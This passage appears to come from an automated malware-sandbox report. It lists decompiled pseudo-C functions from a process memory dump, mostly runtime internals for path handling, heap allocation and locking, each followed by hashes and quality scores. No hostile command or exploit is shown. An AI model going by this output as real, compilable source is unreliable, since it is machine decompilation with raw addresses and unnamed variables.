                                                							if( *0x16d8774 == 0) {
                                                								asm("cdq");
                                                								 *(_t79 + 0xf70) = _v64;
                                                								 *(_t79 + 0xf74) = 0x100;
                                                								_t75 = 0;
                                                								_t73 = 4;
                                                								_v60 =  &_v68;
                                                								_v52 = _t73;
                                                								_v36 = _t73;
                                                								_t74 = _v76;
                                                								_v44 =  &_v72;
                                                								 *0x16d8774 = 1;
                                                								_v56 = 0;
                                                								_v28 = _t74[2];
                                                								_v48 = 0;
                                                								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                								_v40 = 0;
                                                								_v32 = 0;
                                                								_v24 = 0;
                                                								_v16 = 0;
                                                								if(E015EB6F0(0x15cc338, 0x15cc288, 3,  &_v60) == 0) {
                                                									_v80 = _v80 | 0xffffffff;
                                                									_push( &_v84);
                                                									_push(0);
                                                									_push(_v64);
                                                									_v84 = 0xfa0a1f00;
                                                									E01629520();
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				if(_v64 != 0) {
                                                					_push(_v64);
                                                					E016295D0();
                                                					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                				}
                                                				if(_t77 != 0) {
                                                					E015FFFB0(_t68, _t77, 0x16d8778);
                                                				}
                                                				_pop(_t78);
                                                				return E0162B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                			}

































                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc100e527e02746749609885345be0d00caaf1702bf293a7f87b5a3103e3a4b6
                                                • Instruction ID: da2c68f9e6ba5f1fc24e604048baf7af1d42703a9d9f9459aee3ca79bd1c9cbc
                                                • Opcode Fuzzy Hash: bc100e527e02746749609885345be0d00caaf1702bf293a7f87b5a3103e3a4b6
                                                • Instruction Fuzzy Hash: E14146B1E01219AFDB24DFAADD40BBEBBF9EF48714F14812EE915A7240DB709905CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E015E5210(intOrPtr _a4, void* _a8) {
                                                				void* __ecx;
                                                				intOrPtr _t31;
                                                				signed int _t32;
                                                				signed int _t33;
                                                				intOrPtr _t35;
                                                				signed int _t52;
                                                				void* _t54;
                                                				void* _t56;
                                                				unsigned int _t59;
                                                				signed int _t60;
                                                				void* _t61;
                                                
                                                				_t61 = E015E52A5(1);
                                                				if(_t61 == 0) {
                                                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                				} else {
                                                					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                				}
                                                				_t60 = _t59 >> 1;
                                                				_t32 = 0x3a;
                                                				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                					_t52 = _t60 + _t60;
                                                					if(_a4 > _t52) {
                                                						goto L5;
                                                					}
                                                					if(_t61 != 0) {
                                                						asm("lock xadd [esi], eax");
                                                						if((_t32 | 0xffffffff) == 0) {
                                                							_push( *((intOrPtr*)(_t61 + 4)));
                                                							E016295D0();
                                                							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                						}
                                                					} else {
                                                						E015FEB70(_t54, 0x16d79a0);
                                                					}
                                                					_t26 = _t52 + 2; // 0xddeeddf0
                                                					return _t26;
                                                				} else {
                                                					_t52 = _t60 + _t60;
                                                					if(_a4 < _t52) {
                                                						if(_t61 != 0) {
                                                							asm("lock xadd [esi], eax");
                                                							if((_t32 | 0xffffffff) == 0) {
                                                								_push( *((intOrPtr*)(_t61 + 4)));
                                                								E016295D0();
                                                								L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                							}
                                                						} else {
                                                							E015FEB70(_t54, 0x16d79a0);
                                                						}
                                                						return _t52;
                                                					}
                                                					L5:
                                                					_t33 = E0162F3E0(_a8, _t54, _t52);
                                                					if(_t61 == 0) {
                                                						E015FEB70(_t54, 0x16d79a0);
                                                					} else {
                                                						asm("lock xadd [esi], eax");
                                                						if((_t33 | 0xffffffff) == 0) {
                                                							_push( *((intOrPtr*)(_t61 + 4)));
                                                							E016295D0();
                                                							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                						}
                                                					}
                                                					_t35 = _a8;
                                                					if(_t60 <= 1) {
                                                						L9:
                                                						_t60 = _t60 - 1;
                                                						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                						goto L10;
                                                					} else {
                                                						_t56 = 0x3a;
                                                						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                							 *((short*)(_t52 + _t35)) = 0;
                                                							L10:
                                                							return _t60 + _t60;
                                                						}
                                                						goto L9;
                                                					}
                                                				}
                                                			}















                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c02b8103001438d88daef467e9f24ac016abb11f0159e6ff051c5d72ca2de818
                                                • Instruction ID: 5d6cdf491f37845ae053c4d93cbb81c7cbe4ff2d4e5c6728aca8bc4faec74c35
                                                • Opcode Fuzzy Hash: c02b8103001438d88daef467e9f24ac016abb11f0159e6ff051c5d72ca2de818
                                                • Instruction Fuzzy Hash: B6312A32A51622DBC7269F28CC45FAA77E6FF50764F114A1DF6954F2A1E730F804C690
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01623D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                				intOrPtr _v8;
                                                				char _v12;
                                                				signed short** _t33;
                                                				short* _t38;
                                                				intOrPtr* _t39;
                                                				intOrPtr* _t41;
                                                				signed short _t43;
                                                				intOrPtr* _t47;
                                                				intOrPtr* _t53;
                                                				signed short _t57;
                                                				intOrPtr _t58;
                                                				signed short _t60;
                                                				signed short* _t61;
                                                
                                                				_t47 = __ecx;
                                                				_t61 = __edx;
                                                				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                				if(_t60 > 0xfffe) {
                                                					L22:
                                                					return 0xc0000106;
                                                				}
                                                				if(__edx != 0) {
                                                					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                						L5:
                                                						E015F7B60(0, _t61, 0x15c11c4);
                                                						_v12 =  *_t47;
                                                						_v12 = _v12 + 0xfff8;
                                                						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                						E015F7B60(0xfff8, _t61,  &_v12);
                                                						_t33 = _a8;
                                                						if(_t33 != 0) {
                                                							 *_t33 = _t61;
                                                						}
                                                						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                						_t53 = _a12;
                                                						if(_t53 != 0) {
                                                							_t57 = _t61[2];
                                                							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                							while(_t38 >= _t57) {
                                                								if( *_t38 == 0x5c) {
                                                									_t41 = _t38 + 2;
                                                									if(_t41 == 0) {
                                                										break;
                                                									}
                                                									_t58 = 0;
                                                									if( *_t41 == 0) {
                                                										L19:
                                                										 *_t53 = _t58;
                                                										goto L7;
                                                									}
                                                									 *_t53 = _t41;
                                                									goto L7;
                                                								}
                                                								_t38 = _t38 - 2;
                                                							}
                                                							_t58 = 0;
                                                							goto L19;
                                                						} else {
                                                							L7:
                                                							_t39 = _a16;
                                                							if(_t39 != 0) {
                                                								 *_t39 = 0;
                                                								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                							}
                                                							return 0;
                                                						}
                                                					}
                                                					_t61 = _a4;
                                                					if(_t61 != 0) {
                                                						L3:
                                                						_t43 = L01604620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                						_t61[2] = _t43;
                                                						if(_t43 == 0) {
                                                							return 0xc0000017;
                                                						}
                                                						_t61[1] = _t60;
                                                						 *_t61 = 0;
                                                						goto L5;
                                                					}
                                                					goto L22;
                                                				}
                                                				_t61 = _a4;
                                                				if(_t61 == 0) {
                                                					return 0xc000000d;
                                                				}
                                                				goto L3;
                                                			}

















                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ac7b8774cf4da9797a8a8d3518c517e33691d3c52f4e8f26ce3cdb2887d28a4
                                                • Instruction ID: 84187ca2b74cce4e1e0056eeb5c957914cdb79ecac73025aa1496c3ff878821c
                                                • Opcode Fuzzy Hash: 2ac7b8774cf4da9797a8a8d3518c517e33691d3c52f4e8f26ce3cdb2887d28a4
                                                • Instruction Fuzzy Hash: CE318F32A05A25DBDB258F2DCC41A7ABBB5FF99710B05846EE985CB350E738D841CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0161A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr _t35;
                                                				intOrPtr _t39;
                                                				intOrPtr _t45;
                                                				intOrPtr* _t51;
                                                				intOrPtr* _t52;
                                                				intOrPtr* _t55;
                                                				signed int _t57;
                                                				intOrPtr* _t59;
                                                				intOrPtr _t68;
                                                				intOrPtr* _t77;
                                                				void* _t79;
                                                				signed int _t80;
                                                				intOrPtr _t81;
                                                				char* _t82;
                                                				void* _t83;
                                                
                                                				_push(0x24);
                                                				_push(0x16c0220);
                                                				E0163D08C(__ebx, __edi, __esi);
                                                				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                				_t79 = __ecx;
                                                				_t35 =  *0x16d7b9c; // 0x0
                                                				_t55 = L01604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                				if(_t55 == 0) {
                                                					_t39 = 0xc0000017;
                                                					L11:
                                                					return E0163D0D1(_t39);
                                                				}
                                                				_t68 = 0;
                                                				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                				_t7 = _t55 + 8; // 0x8
                                                				_t57 = 6;
                                                				memcpy(_t7, _t79, _t57 << 2);
                                                				_t80 = 0xfffffffe;
                                                				 *(_t83 - 4) = _t80;
                                                				if(0 < 0) {
                                                					L14:
                                                					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                					L20:
                                                					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                					_t39 = _t81;
                                                					goto L11;
                                                				}
                                                				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                					_t81 = 0xc000007b;
                                                					goto L20;
                                                				}
                                                				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                					_t45 =  *_t59;
                                                					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                					 *_t59 = _t45 + 1;
                                                					L6:
                                                					 *(_t83 - 4) = 1;
                                                					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                					 *(_t83 - 4) = _t80;
                                                					if(_t68 < 0) {
                                                						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                						if(_t82 == 0) {
                                                							goto L14;
                                                						}
                                                						asm("btr eax, ecx");
                                                						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                						if( *_t82 != 0) {
                                                							 *0x16d7b10 =  *0x16d7b10 - 8;
                                                						}
                                                						goto L20;
                                                					}
                                                					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                					_t51 =  *0x16d536c; // 0x776f5368
                                                					if( *_t51 != 0x16d5368) {
                                                						_push(3);
                                                						asm("int 0x29");
                                                						goto L14;
                                                					}
                                                					 *_t55 = 0x16d5368;
                                                					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                					 *_t51 = _t55;
                                                					 *0x16d536c = _t55;
                                                					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                					if(_t52 != 0) {
                                                						 *_t52 = _t55;
                                                					}
                                                					_t39 = 0;
                                                					goto L11;
                                                				}
                                                				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                				_t68 = E0161A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                				if(_t68 < 0) {
                                                					goto L14;
                                                				}
                                                				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                				goto L6;
                                                			}



















                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84307068b5e265edb89e0a95e94315004792d709b47bddda55906df1a6970db2
                                                • Instruction ID: 2c5bab0cac01af5c0e00208569471c3ee4793da5e87cde47107f6174b966b0ff
                                                • Opcode Fuzzy Hash: 84307068b5e265edb89e0a95e94315004792d709b47bddda55906df1a6970db2
                                                • Instruction Fuzzy Hash: 6C418EB5A01355DFDB15CF98CC80BA9BBF2BB49304F1980ADE905AB348D774A901CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E0160C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                				signed int* _v8;
                                                				char _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed char _t33;
                                                				signed char _t43;
                                                				signed char _t48;
                                                				signed char _t62;
                                                				void* _t63;
                                                				intOrPtr _t69;
                                                				intOrPtr _t71;
                                                				unsigned int* _t82;
                                                				void* _t83;
                                                
                                                				_t80 = __ecx;
                                                				_t82 = __edx;
                                                				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                				if((_t33 & 0x00000001) != 0) {
                                                					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                					if(E01607D50() != 0) {
                                                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                					} else {
                                                						_t43 = 0x7ffe0386;
                                                					}
                                                					if( *_t43 != 0) {
                                                						_t43 = E016B8D34(_v8, _t80);
                                                					}
                                                					E01602280(_t43, _t82);
                                                					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                						E015FFFB0(_t62, _t80, _t82);
                                                						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                						_t30 = _t80 + 0xd0; // 0xd0
                                                						_t83 = _t30;
                                                						E016B8833(_t83,  &_v16);
                                                						_t81 = _t80 + 0x90;
                                                						E015FFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                						_t63 = 0;
                                                						_push(0);
                                                						_push(_t83);
                                                						_t48 = E0162B180();
                                                						if(_a4 != 0) {
                                                							E01602280(_t48, _t81);
                                                						}
                                                					} else {
                                                						_t69 = _v8;
                                                						_t12 = _t80 + 0x98; // 0x98
                                                						_t13 = _t69 + 0xc; // 0x575651ff
                                                						E0160BB2D(_t13, _t12);
                                                						_t71 = _v8;
                                                						_t15 = _t80 + 0xb0; // 0xb0
                                                						_t16 = _t71 + 8; // 0x8b000cc2
                                                						E0160BB2D(_t16, _t15);
                                                						E0160B944(_v8, _t62);
                                                						 *((char*)(_t80 + 0xdc)) = 0;
                                                						E015FFFB0(0, _t80, _t82);
                                                						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                						 *(_t80 + 0xde) = 0;
                                                						if(_a4 == 0) {
                                                							_t25 = _t80 + 0x90; // 0x90
                                                							E015FFFB0(0, _t80, _t25);
                                                						}
                                                						_t63 = 1;
                                                					}
                                                					return _t63;
                                                				}
                                                				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                				if(_a4 == 0) {
                                                					_t24 = _t80 + 0x90; // 0x90
                                                					E015FFFB0(0, __ecx, _t24);
                                                				}
                                                				return 0;
                                                			}

















                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                • Instruction ID: d09ff4453cceff34d695f330f8dfae5ad947068c92786f120cf0c37bf4c4a6d0
                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                • Instruction Fuzzy Hash: FA310672601547AED70AEBB4CC90BEAFB55BF52204F04829ED51C5B381DB346A4ACBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E01667016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                				signed int _v8;
                                                				char _v588;
                                                				intOrPtr _v592;
                                                				intOrPtr _v596;
                                                				signed short* _v600;
                                                				char _v604;
                                                				short _v606;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed short* _t55;
                                                				void* _t56;
                                                				signed short* _t58;
                                                				signed char* _t61;
                                                				char* _t68;
                                                				void* _t69;
                                                				void* _t71;
                                                				void* _t72;
                                                				signed int _t75;
                                                
                                                				_t64 = __edx;
                                                				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                				_v8 =  *0x16dd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                				_t55 = _a16;
                                                				_v606 = __ecx;
                                                				_t71 = 0;
                                                				_t58 = _a12;
                                                				_v596 = __edx;
                                                				_v600 = _t58;
                                                				_t68 =  &_v588;
                                                				if(_t58 != 0) {
                                                					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                					if(_t55 != 0) {
                                                						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                					}
                                                				}
                                                				_t8 = _t71 + 0x2a; // 0x28
                                                				_t33 = _t8;
                                                				_v592 = _t8;
                                                				if(_t71 <= 0x214) {
                                                					L6:
                                                					 *((short*)(_t68 + 6)) = _v606;
                                                					if(_t64 != 0xffffffff) {
                                                						asm("cdq");
                                                						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                						 *((char*)(_t68 + 0x28)) = _a4;
                                                						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                						 *((char*)(_t68 + 0x29)) = _a8;
                                                						if(_t71 != 0) {
                                                							_t22 = _t68 + 0x2a; // 0x2a
                                                							_t64 = _t22;
                                                							E01666B4C(_t58, _t22, _t71,  &_v604);
                                                							if(_t55 != 0) {
                                                								_t25 = _v604 + 0x2a; // 0x2a
                                                								_t64 = _t25 + _t68;
                                                								E01666B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                							}
                                                							if(E01607D50() == 0) {
                                                								_t61 = 0x7ffe0384;
                                                							} else {
                                                								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                							}
                                                							_push(_t68);
                                                							_push(_v592 + 0xffffffe0);
                                                							_push(0x402);
                                                							_push( *_t61 & 0x000000ff);
                                                							E01629AE0();
                                                						}
                                                					}
                                                					_t35 =  &_v588;
                                                					if( &_v588 != _t68) {
                                                						_t35 = L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                					}
                                                					L16:
                                                					_pop(_t69);
                                                					_pop(_t72);
                                                					_pop(_t56);
                                                					return E0162B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                				}
                                                				_t68 = L01604620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                				if(_t68 == 0) {
                                                					goto L16;
                                                				} else {
                                                					_t58 = _v600;
                                                					_t64 = _v596;
                                                					goto L6;
                                                				}
                                                			}























                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30f0bb63220e56700a06a6f1ddcb6bab99fc228aefc0c9b0651da2a6fa4c3981
                                                • Instruction ID: 0f4fa2ba58bd7fbc57702d49baf71bb3a4dc048091012bb306f14135fe1dcce1
                                                • Opcode Fuzzy Hash: 30f0bb63220e56700a06a6f1ddcb6bab99fc228aefc0c9b0651da2a6fa4c3981
                                                • Instruction Fuzzy Hash: E431B1726047919BC321DF28CD40A6BB7EAFF98704F044A2DF99587790E730E914CBA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0161A70E(intOrPtr* __ecx, char* __edx) {
                                                				unsigned int _v8;
                                                				intOrPtr* _v12;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t16;
                                                				intOrPtr _t17;
                                                				intOrPtr _t28;
                                                				char* _t33;
                                                				intOrPtr _t37;
                                                				intOrPtr _t38;
                                                				void* _t50;
                                                				intOrPtr _t52;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t52 =  *0x16d7b10; // 0x0
                                                				_t33 = __edx;
                                                				_t48 = __ecx;
                                                				_v12 = __ecx;
                                                				if(_t52 == 0) {
                                                					 *0x16d7b10 = 8;
                                                					 *0x16d7b14 = 0x16d7b0c;
                                                					 *0x16d7b18 = 1;
                                                					L6:
                                                					_t2 = _t52 + 1; // 0x1
                                                					E0161A990(0x16d7b10, _t2, 7);
                                                					asm("bts ecx, eax");
                                                					 *_t48 = _t52;
                                                					 *_t33 = 1;
                                                					L3:
                                                					_t16 = 0;
                                                					L4:
                                                					return _t16;
                                                				}
                                                				_t17 = L0161A840(__edx, __ecx, __ecx, _t52, 0x16d7b10, 1, 0);
                                                				if(_t17 == 0xffffffff) {
                                                					_t37 =  *0x16d7b10; // 0x0
                                                					_t3 = _t37 + 0x27; // 0x27
                                                					__eflags = _t3 >> 5 -  *0x16d7b18; // 0x0
                                                					if(__eflags > 0) {
                                                						_t38 =  *0x16d7b9c; // 0x0
                                                						_t4 = _t52 + 0x27; // 0x27
                                                						_v8 = _t4 >> 5;
                                                						_t50 = L01604620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                						__eflags = _t50;
                                                						if(_t50 == 0) {
                                                							_t16 = 0xc0000017;
                                                							goto L4;
                                                						}
                                                						 *0x16d7b18 = _v8;
                                                						_t8 = _t52 + 7; // 0x7
                                                						E0162F3E0(_t50,  *0x16d7b14, _t8 >> 3);
                                                						_t28 =  *0x16d7b14; // 0x0
                                                						__eflags = _t28 - 0x16d7b0c;
                                                						if(_t28 != 0x16d7b0c) {
                                                							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                						}
                                                						_t9 = _t52 + 8; // 0x8
                                                						 *0x16d7b14 = _t50;
                                                						_t48 = _v12;
                                                						 *0x16d7b10 = _t9;
                                                						goto L6;
                                                					}
                                                					 *0x16d7b10 = _t37 + 8;
                                                					goto L6;
                                                				}
                                                				 *__ecx = _t17;
                                                				 *_t33 = 0;
                                                				goto L3;
                                                			}

















                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f66ac8e0932086ee63fd88cade6af146abf39f0d592f845ddfa29607ab4e79ab
                                                • Instruction ID: bc9b67a189b0677911b62803d81c31278a764582c2f281e32f66c3f20529b8ba
                                                • Opcode Fuzzy Hash: f66ac8e0932086ee63fd88cade6af146abf39f0d592f845ddfa29607ab4e79ab
                                                • Instruction Fuzzy Hash: D831F3B5A02241DFD721CF48DC80F267BF9FB84718F18095AEA46C7348D770AA11CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E016161A0(signed int* __ecx) {
                                                				intOrPtr _v8;
                                                				char _v12;
                                                				intOrPtr* _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _t30;
                                                				intOrPtr _t31;
                                                				void* _t32;
                                                				intOrPtr _t33;
                                                				intOrPtr _t37;
                                                				intOrPtr _t49;
                                                				signed int _t51;
                                                				intOrPtr _t52;
                                                				signed int _t54;
                                                				void* _t59;
                                                				signed int* _t61;
                                                				intOrPtr* _t64;
                                                
                                                				_t61 = __ecx;
                                                				_v12 = 0;
                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                				_v16 = __ecx;
                                                				_v8 = 0;
                                                				if(_t30 == 0) {
                                                					L6:
                                                					_t31 = 0;
                                                					L7:
                                                					return _t31;
                                                				}
                                                				_t32 = _t30 + 0x5d8;
                                                				if(_t32 == 0) {
                                                					goto L6;
                                                				}
                                                				_t59 = _t32 + 0x30;
                                                				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                					goto L6;
                                                				}
                                                				if(__ecx != 0) {
                                                					 *((intOrPtr*)(__ecx)) = 0;
                                                					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                				}
                                                				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                					_t51 =  *(_t32 + 0x10);
                                                					_t33 = _t32 + 0x10;
                                                					_v20 = _t33;
                                                					_t54 =  *(_t33 + 4);
                                                					if((_t51 | _t54) == 0) {
                                                						_t37 = E01615E50(0x15c67cc, 0, 0,  &_v12);
                                                						if(_t37 != 0) {
                                                							goto L6;
                                                						}
                                                						_t52 = _v8;
                                                						asm("lock cmpxchg8b [esi]");
                                                						_t64 = _v16;
                                                						_t49 = _t37;
                                                						_v20 = 0;
                                                						if(_t37 == 0) {
                                                							if(_t64 != 0) {
                                                								 *_t64 = _v12;
                                                								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                							}
                                                							E016B9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                							_t31 = 1;
                                                							goto L7;
                                                						}
                                                						E015EF7C0(_t52, _v12, _t52, 0);
                                                						if(_t64 != 0) {
                                                							 *_t64 = _t49;
                                                							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                						}
                                                						L12:
                                                						_t31 = 1;
                                                						goto L7;
                                                					}
                                                					if(_t61 != 0) {
                                                						 *_t61 = _t51;
                                                						_t61[1] = _t54;
                                                					}
                                                					goto L12;
                                                				} else {
                                                					goto L6;
                                                				}
                                                			}




















                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9881fb17b80cfbecaa8350727797df4a49cfc0607f81f74dd4a441f77121d617
                                                • Instruction ID: 40dcc2e44d50e5dce0f34b4216db8fbc62713d348007feb4eb2bc8c4e2f76435
                                                • Opcode Fuzzy Hash: 9881fb17b80cfbecaa8350727797df4a49cfc0607f81f74dd4a441f77121d617
                                                • Instruction Fuzzy Hash: 7A317A716057118FE360CF1DCC40B26BBE5FB88B00F49496DE9989B351E7B0E904CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b278b200f04feabcf9fb3611876ef3bb2cd867652f22bdcdacdaf86e3377907c
                                                • Instruction ID: 413087d5b9f8d88f7ea01037227f149a3778fe20d8dbb63949766d0f65926af1
                                                • Opcode Fuzzy Hash: b278b200f04feabcf9fb3611876ef3bb2cd867652f22bdcdacdaf86e3377907c
                                                • Instruction Fuzzy Hash: BA31D471A0062AABCB159FA8CD41A7FB7B9FF44700B01446DF901DB240EB749D11CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E01624A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                				signed int _v8;
                                                				signed int* _v12;
                                                				char _v13;
                                                				signed int _v16;
                                                				char _v21;
                                                				signed int* _v24;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				signed int* _t32;
                                                				signed int* _t41;
                                                				signed int _t42;
                                                				void* _t43;
                                                				intOrPtr* _t51;
                                                				void* _t52;
